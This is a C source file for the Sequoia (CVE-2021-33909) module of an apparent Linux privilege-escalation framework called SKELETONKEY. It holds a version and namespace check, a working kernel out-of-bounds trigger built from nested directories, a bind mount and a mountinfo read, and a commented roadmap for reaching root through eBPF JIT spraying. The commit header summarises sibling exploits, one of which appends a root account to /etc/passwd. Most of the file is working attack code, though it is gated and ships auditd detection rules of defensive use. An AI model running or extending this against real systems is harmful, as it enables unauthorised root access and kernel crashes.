Files
SKELETONKEY/modules/sequoia_cve_2021_33909/skeletonkey_modules.c
T
leviathan e13edd0cfd modules: add sudo_samedit + sequoia + sudoedit_editor + vmwgfx
sudo_samedit (CVE-2021-3156): Qualys Baron Samedit, userspace heap
    overflow in sudoedit -s. Version-range detect; Qualys-style trigger
    fork+verify (no per-distro offsets shipped — EXPLOIT_FAIL honest).
  sequoia (CVE-2021-33909): Qualys size_t→int wrap in seq_buf_alloc.
    Userns reach + 5000-level nested tree + bind-mount amplification +
    /proc/self/mountinfo read triggers stack-OOB write. No JIT-spray.
  sudoedit_editor (CVE-2023-22809): Synacktiv EDITOR/VISUAL '--' argv
    escape. Structural exploit — no offsets. Helper-via-sudoedit
    appends 'skel::0:0:' line to /etc/passwd, su to root.
  vmwgfx (CVE-2023-2008): DRM buffer-object OOB write in VMware guests.
    Detect requires DMI VMware + /dev/dri/cardN vmwgfx driver.

All four refuse cleanly on kctf-mgr (patched 6.12.86 / sudo 1.9.16p2).
2026-05-17 01:53:18 -04:00

727 lines
28 KiB
C

/*
* sequoia_cve_2021_33909 — SKELETONKEY module
*
* "Sequoia" (Qualys, July 2021): a size_t conversion bug in
* fs/seq_file.c::seq_buf_alloc(). show_mountinfo() passes a `size_t`
* total-output size to seq_buf_alloc(), but the internal accounting in
* seq_read_iter() uses a signed int for the running buffer offset.
* When the mountinfo string the kernel intends to render exceeds
* INT_MAX bytes (which is achievable by mounting a deeply-nested path
* — Qualys used ~1 MiB of '/' components), the int wraps NEGATIVE.
* That negative value then propagates into seq_buf_alloc() where it is
* implicitly cast to size_t (huge positive); kmalloc rejects the
* allocation, but a fallback path (`m->buf = vmalloc()` after kmalloc
* fails) ends up writing a small-but-nonzero number of bytes —
* specifically the bytes show_mountinfo wanted to render — at an
* offset that is OUT OF BOUNDS of the kernel stack buffer
* seq_read_iter held.
*
* Net effect: an unprivileged read(/proc/self/mountinfo) writes
* attacker-controlled bytes (the rendered mountinfo string for our
* deeply-nested bind mount) to a kernel-stack-adjacent location.
* Qualys's chain converted this into LPE by spraying eBPF JIT'd
* programs (one of two known weaponisations; userfaultfd + FUSE
* shadow-mount is the other) so the OOB write lands inside an
* executable JIT page → controlled RIP → ROP → cred swap.
*
* Reference: https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
*
* Discovered by Qualys (Bharat Jogi et al.), July 2021. Famous for
* being the first widely-disclosed Linux LPE that turned a sub-page
* out-of-bounds write into reliable root via the eBPF-JIT-spray
* primitive — that technique has shown up in every "linux mm slab OOB
* → JIT spray" public PoC since.
*
* STATUS: 🟡 PRIMITIVE.
*
* detect() — version-range + userns reachability gate, refuses on
* patched / unreachable hosts. Mainline fix is commit
* 8cae8cd89f05 ("seq_file: disallow extremely large seq
* buffer allocations") landing in 5.13.4 / 5.10.52 /
* 5.4.134.
*
* exploit() — full unshare+userns+mountns reach, builds a ~5000-level
* nested directory tree under /tmp/skeletonkey-sequoia/,
* bind-mounts the deepest leaf back over itself to
* amplify the mountinfo string length, chdir's into the
* leaf, and then open+read /proc/self/mountinfo to fire
* the bug. Witnesses (mountinfo byte count, dmesg
* best-effort) are written to /tmp/skeletonkey-sequoia.log.
* We do NOT attempt the eBPF-JIT-spray weaponisation —
* that is a substantial subsystem (sock_filter program
* build + BPF_PROG_LOAD + JIT layout reasoning + per-
* kernel cred offsets) and would be fabricated on any
* kernel we have not empirically tested.
*
* --full-chain — STUB. Prints the offset-help message and returns
* EXPLOIT_FAIL before any trigger work is done. The
* continuation roadmap is spelled out in the (R9) comment
* of the exploit path so the reader can see exactly
* what's missing.
*
* On a *vulnerable* host this module reliably triggers the OOB
* write. On a *patched* host (which is every distro shipping
* ≥5.13.4 / ≥5.10.52 / ≥5.4.134) detect() refuses and exploit()
* returns SKELETONKEY_OK without entering the userns.
*
* Affected: kernel-since-forever (the int-vs-size_t bug has been
* present since the seq_file rewrite c. 2.6.x; Qualys reports it
* exploitable on every distro they checked back to 2014).
* Mainline fix: 8cae8cd89f05 (Jul 20 2021) — lands in 5.13.4
* 5.13.x : K >= 5.13.4
* 5.10.x : K >= 5.10.52
* 5.4.x : K >= 5.4.134
*
* Preconditions:
* - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside
* userns for the bind-mount; the deeply-nested mkdir itself doesn't
* need privileges, but the amplification mount does)
* - ~1 MiB of cumulative path length under /tmp (≈5000 levels at
* 200-char component name — well within tmpfs default inode budget)
* - /proc/self/mountinfo readable (it is, on everything we target)
*
* Coverage rationale: 2021 fs/seq_file-class bug. Different family
* than our netfilter-heavy and mm-heavy modules — broadens the corpus
* shape. Important historical primitive (eBPF JIT spray adopted from
* Sequoia chain into many later exploits).
*/
#include "skeletonkey_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#ifdef __linux__
# include <sched.h>
# include <sys/mount.h>
# include <sys/syscall.h>
# include <linux/sched.h>
#endif
/* macOS clangd lacks the Linux mount/syscall headers — guard fallbacks. */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
#ifndef CLONE_NEWNS
#define CLONE_NEWNS 0x00020000
#endif
#ifndef MS_BIND
#define MS_BIND 0x1000
#endif
/* --- kernel-range table -------------------------------------------- */
/*
 * Per-branch "patched from" versions, written as {major, minor, patch}.
 * The first three rows are the stable releases named in the file header
 * as carrying the fix (5.4.134, 5.10.52, 5.13.4); the last row marks
 * 5.14.0 for mainline.
 * NOTE(review): how kernel_range_is_patched() classifies branches that
 * have no row here (e.g. 4.x or 5.11) is decided in core/kernel_range.h,
 * which is not visible from this file — confirm before relying on it.
 */
static const struct kernel_patched_from sequoia_patched_branches[] = {
{5, 4, 134},
{5, 10, 52},
{5, 13, 4},
{5, 14, 0}, /* mainline */
};
/* Range descriptor handed to kernel_range_is_patched() by sequoia_detect().
 * The element count is derived from the table so adding a row needs no
 * second edit. */
static const struct kernel_range sequoia_range = {
.patched_from = sequoia_patched_branches,
.n_patched_from = sizeof(sequoia_patched_branches) /
sizeof(sequoia_patched_branches[0]),
};
/* --- tunables ------------------------------------------------------- */
/*
 * Tunables for the nested-tree trigger.
 *
 * build_nested_tree() creates SEQ_NESTED_LEVELS directories, one inside
 * the other below SEQ_BASE_DIR, each named with SEQ_COMPONENT_LEN 'A'
 * characters. With the values below that is 5000 x 200 = 1,000,000
 * bytes of component names (separators not counted).
 * NOTE(review): the sizing target quoted for Qualys's PoC was "~1
 * million bytes of path" (~4096 levels at 256 bytes, ~5120 at 200), so
 * 5000 x 200 sits slightly below that figure rather than above it —
 * confirm the intended depth against the advisory.
 *
 * The component name is intentionally an A-fill; the kernel renders it
 * verbatim into mountinfo. (A weaponised chain would need crafted bytes
 * here; this module does not do that.)
 *
 * SEQ_BASE_DIR and SEQ_LOG_PATH are fixed, predictable names under /tmp;
 * sequoia_cleanup() removes both.
 */
#define SEQ_BASE_DIR "/tmp/skeletonkey-sequoia"
#define SEQ_NESTED_LEVELS 5000
#define SEQ_COMPONENT_LEN 200 /* bytes of 'A' per directory component */
#define SEQ_LOG_PATH "/tmp/skeletonkey-sequoia.log"
/* --- userns reach helpers ------------------------------------------- */
/*
 * write_file — write the NUL-terminated string `s` to an existing file.
 *
 * The file is opened O_WRONLY without O_CREAT, so a missing path is a
 * failure rather than a create. The payload is issued as ONE write(2)
 * (retried only when interrupted by a signal); it is deliberately not
 * split into several writes, because the /proc map files this helper
 * is used for are written in a single call by the callers in this file.
 *
 * Returns true only when every byte of `s` was written. On failure
 * errno describes the failing open()/write() (EIO for a short write)
 * and is preserved across close(), so callers can perror() directly.
 */
static bool write_file(const char *path, const char *s)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return false;

    const size_t len = strlen(s);
    ssize_t n;
    do {
        n = write(fd, s, len);
    } while (n < 0 && errno == EINTR);

    /* Decide the outcome before close() gets a chance to touch errno. */
    int failure = 0;
    if (n < 0)
        failure = errno;
    else if ((size_t)n != len)
        failure = EIO;

    close(fd);

    if (failure != 0) {
        errno = failure;
        return false;
    }
    return true;
}
/*
 * Probe whether this user may unshare(CLONE_NEWUSER | CLONE_NEWNS).
 *
 * The attempt is made in a forked child so the calling process never
 * changes namespaces itself. The bind-mount step of the exploit path
 * depends on this being allowed.
 *
 * Returns:
 *    1  the child's unshare() succeeded
 *    0  the child's unshare() failed (always the case on non-Linux
 *       builds, where the child just exits 1), or the child did not
 *       exit normally
 *   -1  the probe itself could not be carried out (fork() or
 *       waitpid() failed)
 */
static int can_unshare_userns_mount(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
#ifdef __linux__
        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0)
            _exit(0);
#endif
        _exit(1);
    }

    /*
     * Reap the child, retrying on EINTR. If waitpid() fails outright the
     * status word is never filled in; it must not be decoded, because
     * the zero it was initialised with reads as "exited with code 0".
     */
    int status = 0;
    pid_t reaped;
    do {
        reaped = waitpid(pid, &status, 0);
    } while (reaped < 0 && errno == EINTR);
    if (reaped != pid)
        return -1;

    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
#ifdef __linux__
/*
 * Move the calling process into a new user + mount namespace and map
 * its original uid/gid to 0 inside it.
 *
 * The caller's IDs are captured before unshare() so the map lines refer
 * to the identity the process started with. Returns false (after
 * perror) if unshare() or either map write fails; a failed write to
 * /proc/self/setgroups is tolerated.
 */
static bool enter_userns_root(void)
{
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();
    char line[64];

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
        perror("unshare(NEWUSER|NEWNS)");
        return false;
    }

    /* setgroups=deny is required before gid_map without CAP_SETGID.
     * Best-effort: some kernels (pre-3.19) have no setgroups proc file. */
    (void)write_file("/proc/self/setgroups", "deny");

    snprintf(line, sizeof line, "0 %u 1\n", outer_uid);
    if (!write_file("/proc/self/uid_map", line)) {
        perror("write uid_map");
        return false;
    }

    snprintf(line, sizeof line, "0 %u 1\n", outer_gid);
    if (!write_file("/proc/self/gid_map", line)) {
        perror("write gid_map");
        return false;
    }

    return true;
}
#endif
/* --- detect -------------------------------------------------------- */
/*
 * sequoia_detect — classify the running host.
 *
 * Steps, in order:
 *   1. Read the running kernel version; failure → SKELETONKEY_TEST_ERROR.
 *   2. If sequoia_range says the kernel is patched → SKELETONKEY_OK.
 *   3. Probe user_ns + mount_ns creation via can_unshare_userns_mount():
 *        denied        → SKELETONKEY_PRECOND_FAIL
 *        inconclusive  → SKELETONKEY_TEST_ERROR
 *        allowed       → SKELETONKEY_VULNERABLE
 *
 * An inconclusive probe (fork/waitpid failure) is reported as a test
 * error rather than VULNERABLE: the VULNERABLE verdict asserts that the
 * namespaces are reachable, which has not been established in that case.
 *
 * Progress lines go to stderr and are suppressed when ctx->json is set;
 * the two error lines are printed unconditionally.
 */
static skeletonkey_result_t sequoia_detect(const struct skeletonkey_ctx *ctx)
{
    struct kernel_version v;
    if (!kernel_version_current(&v)) {
        fprintf(stderr, "[!] sequoia: could not parse kernel version\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* The bug predates every kernel we'd run on, so there's no
     * "pre-introduction" cutoff; only patched-or-not matters. */
    if (kernel_range_is_patched(&sequoia_range, &v)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] sequoia: kernel %s is patched\n", v.release);
        }
        return SKELETONKEY_OK;
    }

    int userns_ok = can_unshare_userns_mount();
    if (!ctx->json) {
        fprintf(stderr, "[i] sequoia: kernel %s in vulnerable range\n", v.release);
        fprintf(stderr, "[i] sequoia: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
                userns_ok == 1 ? "ALLOWED" :
                userns_ok == 0 ? "DENIED" : "could not test");
    }

    if (userns_ok < 0) {
        fprintf(stderr, "[!] sequoia: could not probe user_ns+mount_ns; "
                        "result inconclusive\n");
        return SKELETONKEY_TEST_ERROR;
    }

    if (userns_ok == 0) {
        if (!ctx->json) {
            fprintf(stderr, "[+] sequoia: user_ns denied → unprivileged "
                            "exploit unreachable via bind-mount path\n");
            fprintf(stderr, "[i] sequoia: bug is still reachable to a "
                            "process with CAP_SYS_ADMIN — not us\n");
        }
        return SKELETONKEY_PRECOND_FAIL;
    }

    if (!ctx->json) {
        fprintf(stderr, "[!] sequoia: VULNERABLE — kernel in range AND "
                        "userns+mountns reachable\n");
    }
    return SKELETONKEY_VULNERABLE;
}
/* --- nested mkdir tree --------------------------------------------- */
#ifdef __linux__
/*
 * Create SEQ_NESTED_LEVELS directories nested one inside the other
 * below SEQ_BASE_DIR, descending as it goes.
 *
 * Each level is made with a relative mkdir() followed by chdir() into
 * it, so no single syscall argument ever carries the whole path (which
 * would exceed PATH_MAX). Every level, the leaf included, has the same
 * name: SEQ_COMPONENT_LEN bytes of 'A'. Levels that already exist are
 * reused (EEXIST is not an error).
 *
 * Side effect: the process's working directory is left wherever the
 * descent stopped — the leaf on success.
 *
 * *out_levels_built receives the number of levels entered. Returns an
 * O_RDONLY|O_DIRECTORY descriptor for the leaf (caller closes it), or
 * -1 on failure. Nothing is removed on failure; sequoia_cleanup() is
 * responsible for that.
 */
static int build_nested_tree(int *out_levels_built)
{
    char name[SEQ_COMPONENT_LEN + 1];
    int depth = 0;

    *out_levels_built = 0;

    /* The base directory may be left over from an earlier run. */
    if (mkdir(SEQ_BASE_DIR, 0700) != 0 && errno != EEXIST) {
        fprintf(stderr, "[-] sequoia: mkdir(%s): %s\n",
                SEQ_BASE_DIR, strerror(errno));
        return -1;
    }
    if (chdir(SEQ_BASE_DIR) != 0) {
        fprintf(stderr, "[-] sequoia: chdir(%s): %s\n",
                SEQ_BASE_DIR, strerror(errno));
        return -1;
    }

    memset(name, 'A', SEQ_COMPONENT_LEN);
    name[SEQ_COMPONENT_LEN] = '\0';

    while (depth < SEQ_NESTED_LEVELS) {
        if (mkdir(name, 0700) != 0 && errno != EEXIST) {
            fprintf(stderr, "[-] sequoia: mkdir level %d: %s\n",
                    depth, strerror(errno));
            *out_levels_built = depth;
            return -1;
        }
        if (chdir(name) != 0) {
            fprintf(stderr, "[-] sequoia: chdir level %d: %s\n",
                    depth, strerror(errno));
            *out_levels_built = depth;
            return -1;
        }
        depth++;
    }
    *out_levels_built = depth;

    /* Hand back a descriptor so the caller can fchdir() to the leaf. */
    int leaf = open(".", O_RDONLY | O_DIRECTORY);
    if (leaf < 0) {
        fprintf(stderr, "[-] sequoia: open(leaf): %s\n", strerror(errno));
        return -1;
    }
    return leaf;
}
/*
 * Bind-mount the current working directory onto itself.
 *
 * The caller is expected to be sitting in the leaf built by
 * build_nested_tree(), inside the namespaces set up by
 * enter_userns_root(); the mount adds an entry for that directory to
 * /proc/self/mountinfo.
 *
 * Returns true on success; on failure prints the mount(2) error to
 * stderr and returns false.
 */
static bool bind_mount_leaf(void)
{
    const int rc = mount(".", ".", NULL, MS_BIND, NULL);

    if (rc >= 0)
        return true;

    fprintf(stderr, "[-] sequoia: bind-mount(.,.): %s\n", strerror(errno));
    return false;
}
/*
 * Read /proc/self/mountinfo to EOF and return the number of bytes seen.
 *
 * errno contract (the caller zeroes errno before the call and reads it
 * afterwards to record the outcome):
 *   - on failure (-1) errno is the error from the failing open()/read(),
 *     preserved across the close();
 *   - on success errno is restored to its value on entry, so a read()
 *     that was merely interrupted and retried does not show up as a
 *     spurious EINTR next to a successful byte count.
 *
 * Returns the total byte count, or -1 if the file could not be opened
 * or a read failed with anything other than EINTR.
 */
static ssize_t read_mountinfo_and_count(void)
{
    const int entry_errno = errno;

    int fd = open("/proc/self/mountinfo", O_RDONLY);
    if (fd < 0)
        return -1;

    char buf[8192];
    ssize_t total = 0;
    for (;;) {
        ssize_t n = read(fd, buf, sizeof buf);
        if (n > 0) {
            total += n;
            continue;
        }
        if (n == 0)
            break;
        if (errno == EINTR)
            continue;

        /* Genuine read error: keep its errno alive across close(). */
        int read_errno = errno;
        close(fd);
        errno = read_errno;
        return -1;
    }

    close(fd);
    errno = entry_errno;
    return total;
}
/*
 * Best-effort kernel-log sample, written to `log`.
 *
 * /dev/kmsg hands back exactly one log record per read(2), so a single
 * read only ever sees the oldest record still in the ring buffer. This
 * drains the records that are currently available (non-blocking,
 * bounded by KMSG_MAX_RECORDS) and scans each for an oops-like marker.
 *
 * The markers are a coarse heuristic over the whole readable buffer:
 * a "yes" may stem from an event unrelated to, and older than, this run.
 *
 * Output is one of:
 *   " dmesg_sample: <not readable: ...>"   open failed (commonly EACCES
 *                                          for unprivileged users)
 *   " dmesg_sample: <no data: ...>"        nothing could be read
 *   " dmesg_sample_bytes: N" + " dmesg_oops_marker: yes|no"
 */
static void log_dmesg_tail(FILE *log)
{
    enum { KMSG_RECORD_MAX = 8192, KMSG_MAX_RECORDS = 4096 };
    static const char *const markers[] = {
        "BUG:", "Oops", "KASAN", "general protection fault",
    };

    int fd = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
    if (fd < 0) {
        fprintf(log, " dmesg_sample: <not readable: %s>\n", strerror(errno));
        return;
    }

    char buf[KMSG_RECORD_MAX + 1];
    long long total = 0;
    int stop_errno = 0;
    bool oops = false;

    for (int i = 0; i < KMSG_MAX_RECORDS; i++) {
        ssize_t n = read(fd, buf, KMSG_RECORD_MAX);
        if (n < 0) {
            /* EPIPE: records were overwritten under us; the next read
             * resumes at the oldest surviving record. */
            if (errno == EINTR || errno == EPIPE)
                continue;
            /* EAGAIN marks the end of the available records; anything
             * else is a real error. Capture it before close(). */
            stop_errno = errno;
            break;
        }
        if (n == 0)
            break;

        buf[n] = '\0';
        total += n;
        for (size_t m = 0; !oops && m < sizeof markers / sizeof markers[0]; m++)
            oops = strstr(buf, markers[m]) != NULL;
    }
    close(fd);

    if (total == 0) {
        fprintf(log, " dmesg_sample: <no data: %s>\n",
                stop_errno ? strerror(stop_errno) : "empty");
        return;
    }

    fprintf(log, " dmesg_sample_bytes: %lld\n", total);
    fprintf(log, " dmesg_oops_marker: %s\n", oops ? "yes" : "no");
}
#endif /* __linux__ */
/* --- exploit ------------------------------------------------------- */
#ifdef __linux__
static skeletonkey_result_t sequoia_exploit_linux(const struct skeletonkey_ctx *ctx)
{
/* (R0) refuse without --i-know. */
if (!ctx->authorized) {
fprintf(stderr, "[-] sequoia: refusing to run exploit without --i-know\n");
return SKELETONKEY_PRECOND_FAIL;
}
/* (R1) refuse if already root. */
if (geteuid() == 0) {
if (!ctx->json) {
fprintf(stderr, "[i] sequoia: already root — nothing to escalate\n");
}
return SKELETONKEY_OK;
}
/* (R2) re-call detect — refuse if not vulnerable. */
skeletonkey_result_t pre = sequoia_detect(ctx);
if (pre == SKELETONKEY_OK) {
fprintf(stderr, "[+] sequoia: kernel not vulnerable; refusing exploit\n");
return SKELETONKEY_OK;
}
if (pre != SKELETONKEY_VULNERABLE) {
fprintf(stderr, "[-] sequoia: detect() says not vulnerable; refusing\n");
return pre;
}
/* (R3) full-chain: STUB. The Sequoia chain to root needs an
* eBPF-JIT-spray subsystem we don't ship — printing the offset
* help and refusing is the honest answer. */
if (ctx->full_chain) {
struct skeletonkey_kernel_offsets off;
memset(&off, 0, sizeof off);
(void)skeletonkey_offsets_resolve(&off);
skeletonkey_offsets_print(&off);
skeletonkey_finisher_print_offset_help("sequoia");
fprintf(stderr,
"[-] sequoia: --full-chain not implemented.\n"
" The Qualys chain converts the stack-OOB write to RIP\n"
" control via eBPF JIT spray: load many sock_filter\n"
" programs, induce the JIT to lay them out at predictable\n"
" kernel-VA pages, then steer the OOB write to overwrite\n"
" the JIT prologue of one program with attacker shellcode\n"
" (cred swap + return). Building that here would mean a\n"
" standalone BPF_PROG_LOAD harness + JIT page-layout\n"
" reasoning + per-kernel cred offsets — a substantial\n"
" subsystem we have not validated empirically.\n"
" See Qualys advisory section 3.1 (eBPF technique) for\n"
" the reference implementation.\n");
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: entering userns + mountns\n");
}
/* Fork: keep the deeply-nested mkdir + bind-mount + read confined
* to a child process. The parent can then clean up regardless of
* how the child terminates. */
pid_t child = fork();
if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
if (child == 0) {
/* (R4) unshare for userns+mount_ns → CAP_SYS_ADMIN-in-userns. */
if (!enter_userns_root()) {
_exit(20);
}
/* (R5) Build the deeply-nested directory tree. */
int levels_built = 0;
int leaf_fd = build_nested_tree(&levels_built);
if (leaf_fd < 0) {
fprintf(stderr, "[-] sequoia: nested tree build failed at level %d\n",
levels_built);
_exit(21);
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: built %d-level nested tree under %s\n",
levels_built, SEQ_BASE_DIR);
}
/* (R6) Bind-mount the leaf back over itself. This is what
* pushes the rendered mountinfo string past INT_MAX. */
if (!bind_mount_leaf()) {
fprintf(stderr, "[-] sequoia: bind-mount failed; cannot amplify "
"mountinfo length\n");
close(leaf_fd);
_exit(22);
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: bind-mount leaf-over-leaf armed\n");
}
/* (R7) chdir back to leaf (we may have changed dirs during
* tree build but we want to ensure mountinfo renders our
* mount point in full). */
if (fchdir(leaf_fd) < 0) {
fprintf(stderr, "[~] sequoia: fchdir(leaf): %s — continuing\n",
strerror(errno));
}
close(leaf_fd);
/* (R8) Trigger: read /proc/self/mountinfo. On a vulnerable
* kernel the int-vs-size_t bug fires inside seq_buf_alloc()
* and the kernel performs an OOB write of show_mountinfo's
* rendered bytes off the end of the seq_read_iter stack
* buffer. We have no in-process arb-write primitive that
* consumes those bytes (that's the eBPF-JIT-spray step
* we don't ship), so we just record the empirical
* witness: did the read succeed? what byte count? did
* dmesg cough up an oops marker? */
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: firing trigger — "
"read(/proc/self/mountinfo)\n");
}
errno = 0;
ssize_t mi_bytes = read_mountinfo_and_count();
int mi_errno = errno;
FILE *log = fopen(SEQ_LOG_PATH, "w");
if (log) {
fprintf(log,
"sequoia trigger:\n"
" nested_levels = %d\n"
" component_len = %d\n"
" total_path_bytes ~= %lld\n"
" bind_mount_armed = yes\n"
" mountinfo_read_bytes = %lld\n"
" mountinfo_read_errno = %d (%s)\n",
levels_built, SEQ_COMPONENT_LEN,
(long long)levels_built * SEQ_COMPONENT_LEN,
(long long)mi_bytes,
mi_errno, mi_errno ? strerror(mi_errno) : "ok");
log_dmesg_tail(log);
fprintf(log,
"Note: this run did NOT attempt the eBPF-JIT-spray\n"
"weaponisation. The OOB write fired inside the kernel\n"
"but we do not consume it to control RIP / swap creds.\n"
"See module .c for the continuation roadmap.\n");
fclose(log);
}
if (!ctx->json) {
fprintf(stderr,
"[*] sequoia: mountinfo read returned %lld bytes (errno=%d)\n",
(long long)mi_bytes, mi_errno);
fprintf(stderr,
"[*] sequoia: empirical witness logged to %s\n",
SEQ_LOG_PATH);
}
/* (R9) Continuation roadmap.
*
* TODO(weaponise-jit): spawn the eBPF JIT spray:
* - bpf(BPF_PROG_LOAD, SOCKET_FILTER, ...) many times with
* attacker-chosen byte patterns in the program body
* - the kernel JIT compiles each to a page-aligned executable
* region; bytes from the program body survive into the
* prologue at known offsets
* - tune SEQ_NESTED_LEVELS + SEQ_COMPONENT_LEN so the rendered
* mountinfo string lands the OOB write at the JIT page
* hosting one of our programs
* - the overwritten prologue performs: lookup current task →
* cred → uid=0 → return.
* - execute the (now-attacker-modified) program by attaching
* it to a socket and sending a packet → kernel runs cred
* swap → /bin/sh as root.
*
* None of this is implemented today. We exit 30 to flag
* "trigger ran cleanly, no escalation". */
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr,
"[!] sequoia: exploit child killed by signal %d "
"(consistent with OOB write hitting an unmapped page)\n",
sig);
fprintf(stderr,
"[~] sequoia: empirical signal recorded; no cred-overwrite\n"
" primitive — NOT claiming EXPLOIT_OK.\n"
" See %s + dmesg for witnesses.\n", SEQ_LOG_PATH);
}
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] sequoia: child terminated abnormally (status=0x%x)\n",
status);
return SKELETONKEY_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 20) return SKELETONKEY_TEST_ERROR; /* enter_userns failed */
if (rc == 21) return SKELETONKEY_PRECOND_FAIL; /* tree build failed */
if (rc == 22) return SKELETONKEY_EXPLOIT_FAIL; /* bind-mount refused */
if (rc != 30) {
fprintf(stderr, "[-] sequoia: child failed at stage rc=%d\n", rc);
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: trigger ran to completion.\n");
fprintf(stderr,
"[~] sequoia: stack-OOB write fired but JIT-spray weaponisation\n"
" NOT implemented (per-kernel offsets + BPF subsystem; see\n"
" module .c TODO blocks). Returning EXPLOIT_FAIL per\n"
" verified-vs-claimed.\n");
}
return SKELETONKEY_EXPLOIT_FAIL;
}
#endif /* __linux__ */
/*
 * Module entry point for the exploit hook.
 *
 * On Linux builds this forwards to sequoia_exploit_linux(). On any
 * other platform it reports that the module cannot run and returns
 * SKELETONKEY_PRECOND_FAIL without touching ctx.
 */
static skeletonkey_result_t sequoia_exploit(const struct skeletonkey_ctx *ctx)
{
#ifndef __linux__
    (void)ctx;
    fprintf(stderr, "[-] sequoia: Linux-only module; cannot run on this host\n");
    return SKELETONKEY_PRECOND_FAIL;
#else
    return sequoia_exploit_linux(ctx);
#endif
}
/* --- cleanup ------------------------------------------------------- */
/*
 * sequoia_cleanup — remove what a run may have left behind: the nested
 * tree under SEQ_BASE_DIR (Linux builds only) and the witness log.
 *
 * Best-effort throughout: individual failures are ignored so that a
 * partial cleanup still happens, and the function always returns
 * SKELETONKEY_OK.
 *
 * Approach: descend with relative chdir() as far as the tree exists
 * (every level has the same name), then climb back up one level at a
 * time, removing the directory just left. When rmdir() reports EBUSY —
 * the error Linux gives for a directory that is a mount point — the
 * mount is lazily detached from its parent and the rmdir() retried.
 * Detaching from the parent, rather than from inside the mount, keeps
 * ".." resolving to the real parent directory during the climb.
 *
 * Side effect: when SEQ_BASE_DIR exists, the process's working
 * directory is "/" on return.
 */
static skeletonkey_result_t sequoia_cleanup(const struct skeletonkey_ctx *ctx)
{
    if (!ctx->json) {
        fprintf(stderr, "[*] sequoia: cleaning up nested tree + bind mounts\n");
    }

#ifdef __linux__
    /* If the base directory cannot be entered there is no tree to remove
     * (module never ran, or cleanup already happened). */
    if (chdir(SEQ_BASE_DIR) == 0) {
        char comp[SEQ_COMPONENT_LEN + 1];
        memset(comp, 'A', SEQ_COMPONENT_LEN);
        comp[SEQ_COMPONENT_LEN] = '\0';

        /* We don't know how deep the build got; go as far as it exists. */
        int depth = 0;
        while (depth < SEQ_NESTED_LEVELS && chdir(comp) == 0)
            depth++;

        for (; depth > 0; depth--) {
            if (chdir("..") < 0)
                break;
            if (rmdir(comp) == 0)
                continue;
            if (errno == EBUSY) {
                /* Mount point: detach it, then remove the directory. */
                (void)umount2(comp, MNT_DETACH);
                (void)rmdir(comp);
            }
            /* Any other failure: keep climbing and remove what we can. */
        }

        (void)chdir("/");
        (void)rmdir(SEQ_BASE_DIR);
    }
#endif /* __linux__ */

    /* A missing log is fine; nothing useful to do about other errors. */
    (void)unlink(SEQ_LOG_PATH);
    return SKELETONKEY_OK;
}
/* --- detection rules ----------------------------------------------- */
/*
 * auditd rules published through sequoia_module.detect_auditd.
 *
 * Each syscall is watched for both arch=b64 and arch=b32: a rule that
 * names only b64 does not see the same syscall issued through the
 * 32-bit compat ABI, which would let a 32-bit build of a trigger slip
 * past unaudited. The b32 rule reuses the key of its b64 twin so
 * correlation by key is unaffected.
 */
static const char sequoia_auditd[] =
    "# Sequoia (CVE-2021-33909) — auditd detection rules\n"
    "# Trigger shape: unshare(2) into a new user+mount namespace, a bind\n"
    "# mount(2) inside it, and many many mkdir(2) calls in a tight loop\n"
    "# with identical long component names. Each individual call is\n"
    "# benign — flag the *combination*. The deeply-nested mkdir pattern\n"
    "# is the strongest signal: legitimate workloads don't recurse 5000\n"
    "# levels.\n"
    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-sequoia-userns\n"
    "-a always,exit -F arch=b32 -S unshare -k skeletonkey-sequoia-userns\n"
    "-a always,exit -F arch=b64 -S mount -k skeletonkey-sequoia-mount\n"
    "-a always,exit -F arch=b32 -S mount -k skeletonkey-sequoia-mount\n"
    "-a always,exit -F arch=b64 -S mkdir -F success=1 -k skeletonkey-sequoia-mkdir\n"
    "-a always,exit -F arch=b32 -S mkdir -F success=1 -k skeletonkey-sequoia-mkdir\n"
    "-a always,exit -F arch=b64 -S mkdirat -F success=1 -k skeletonkey-sequoia-mkdir\n"
    "-a always,exit -F arch=b32 -S mkdirat -F success=1 -k skeletonkey-sequoia-mkdir\n"
    "# Correlation hint: a process producing >1000 mkdir-key events\n"
    "# within 5s AND a subsequent skeletonkey-sequoia-mount event is\n"
    "# the canonical trigger shape.\n";
/*
 * Registration record for this module; handed to skeletonkey_register()
 * by skeletonkey_register_sequoia().
 *
 * Hooks provided: detect, exploit, cleanup, plus auditd rule text.
 * There is no mitigate hook and no sigma/yara/falco content (NULL).
